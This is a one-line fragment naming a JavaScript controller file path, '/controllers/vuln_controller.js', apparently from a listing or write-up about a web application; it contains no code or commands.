Controller: /controllers/vuln\_controller.js